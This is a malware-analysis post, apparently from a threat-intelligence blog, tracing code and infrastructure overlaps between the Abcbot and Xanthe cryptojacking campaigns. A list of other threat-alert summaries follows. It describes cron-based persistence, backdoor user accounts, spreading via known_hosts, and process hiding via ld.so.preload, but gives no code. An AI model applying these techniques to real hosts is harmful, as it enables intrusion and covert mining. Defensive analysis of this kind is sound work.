Abcbot – An Evolution of Xanthe

There are a few infrastructure overlaps. For example, the following rule allowing ingress traffic from 64[.]225[.]46[.]44 in the Xanthe sample also appears in the Abcbot sample.
Whilst it’s common to see cryptojacking malware authors simply copy code from each other, there are a number of other similarities discussed below which make a direct link in ownership between the Xanthe and Abcbot campaigns more likely.

In the original report from Cisco’s Talos security research team, researchers commented on the coding style of the shell scripts being analysed – in particular, functions being declared at the top of the file and then invoked in some of the later lines.
Talos researchers suggested that this likely aids testing of new iterations, with functionality enabled/disabled through commenting of the lines responsible for function invocation.
Both the Abcbot and Xanthe samples we compared follow this coding style.

Linking these two samples based on code style similarities alone would be tenuous, at best. However, if we look at some of the function names themselves, correlation becomes apparent.
Several of the functions have “go” appended to the end of the function name and some functions have identical names. The following names appear in both samples:

nameservercheck
croncheckgo
checkrc
iptableschecker
filerungo

Comparing the above, we can immediately see that the Abcbot version of the nameservercheck function is significantly larger than the Xanthe counterpart.
The Xanthe sample we analyzed is older than the Abcbot sample by over a year (according to VirusTotal submissions).
This could indicate that the Abcbot version of the function has been iterated on several times, with new functionality added at each iteration.

The croncheckgo function in both samples is responsible for achieving persistence via the cron scheduling utility common to most Linux distributions.
Both samples include a TODO comment from the author, regarding adding logic to determine whether cron is running on different Linux distributions – a note to add logic presumably to deal with this.
The service command is then used to start the cron daemon and cron itself, guaranteeing that any modifications made to the crontab would be honoured by the scheduling utility.
The cron entries consist of curl commands with specified user-agent strings.
The purpose of this is covered in Talos’ research but if we look at the strings themselves, we can see that fczyo-cron is used in both samples, with different version numbers appended to each. Incidentally, one of the payloads downloaded by Xanthe is also named “fczyo”.

Reuse of a unique string such as this does seem more than coincidental and suggests that the code running on servers from both the Xanthe and Abcbot campaigns expects this string to be present in the user-agent.

Talos researchers noted that the method of propagation utilized by Xanthe was via enumeration of the known_hosts file, allowing the malware to spread to new hosts based on hosts the current host had previously connected to.

Our research of Abcbot showed examples of code used to add four malicious users to the compromised host, effectively creating four backdoors for the actor to utilize. The malicious usernames in question were:

logger
sysall
system
autoupdater
In the Xanthe sample, users with the same usernames are added to the system (if they do not already exist).
Similarly, both Abcbot and Xanthe search for and remove users that we assumed were from competing campaigns.

As researchers at Talos reported, perhaps one of the defining features of Xanthe was the use of an open source process hiding library named libprocesshider.so. This was used to hide the process created by the XMRig miner by inserting the path to the library into the /etc/ld.so.preload file.

We did not see evidence of this process hiding technique in the Abcbot sample we analyzed. We did, however, see some code that references use of the technique in previous campaigns (such as Xanthe) in the function kill_miner_proc; a function responsible for clearing artifacts of miners from competing or prior campaigns.

Sign Up For Threat Alerts

Loading...
Threats Icon

Sep 21, 2022

Magic Rat

Cisco Talos has discovered a new remote access trojan (RAT), which analysts are calling "MagicRAT,"...

Threats Icon

Sep 21, 2022

Malicious Word Document with a Frameset

Xavier Mertens spotted a malicious Word OOXML document (with the new ".docx" format) that is...

Threats Icon

Sep 18, 2022

US Cert Alert – Iranian Islamic Revolutionary...

The IRGC-affiliated actors are actively targeting a broad range of entities, including entities across multiple...

Threats Icon

Sep 15, 2022

Opsec Mistakes Reveal COBALT MIRAGE Threat Actors

In this incident, COBALT MIRAGE exploited the ProxyShell vulnerabilities (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207). It is...

Threats Icon

Sep 14, 2022

Dead or Alive – An Emotet Story

The DFIR Report observed a domain-wide compromise that started from a malware ridden Excel document...

Threats Icon

Sep 13, 2022

Dead or Alive? An Emotet Story

The DFIR Report observed a domain-wide compromise that started from a malware ridden Excel document...

Threats Icon

Sep 12, 2022

Shikitega – New stealthy malware targeting Linux

AT&T Alien Labs has discovered a new malware targeting endpoints and IoT devices that are...

Threats Icon

Sep 08, 2022

APT42: Crooked Charms, Cons and Compromises

Mandiant assesses with high confidence that APT42 is an Iranian state-sponsored cyber espionage group tasked...

Threats Icon

Sep 07, 2022

US Cert Alert – Vice Society

The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the...

Threats Icon

Sep 07, 2022

Worok – The big picture

ESET researchers recently found targeted attacks that used undocumented tools against various high-profile companies and...

Threats Icon

Sep 07, 2022

MuddyWater Targets Israel With Log4j Vulnerabilities In...

In recent weeks, the Microsoft Threat Intelligence Center (MSTIC) and Microsoft 365 Defender Research Team...

Threats Icon

Sep 05, 2022

No Honor Among Thieves – Prynt Stealer’s...

Stealing information is fundamental to cybercriminals today to scope and gain access to systems, profile...

Threats Icon

Sep 05, 2022

Grandoreiro Banking Trojan with New TTPs Targeting...

Recently Zscaler ThreatLabz observed a Grandoreiro campaign targeting organizations in the Spanish-speaking nations of Mexico...

Threats Icon

Sep 01, 2022

A Tale of PivNoxy and Chinoxy Puppeteer

An attack against a telecommunications agency in South Asia began with a simple email that...

Threats Icon

Aug 31, 2022

New Golang Ransomware Agenda Customizes Attacks

Investigation revealed that the new ransomware in question targeted enterprises in Asia and Africa. Based...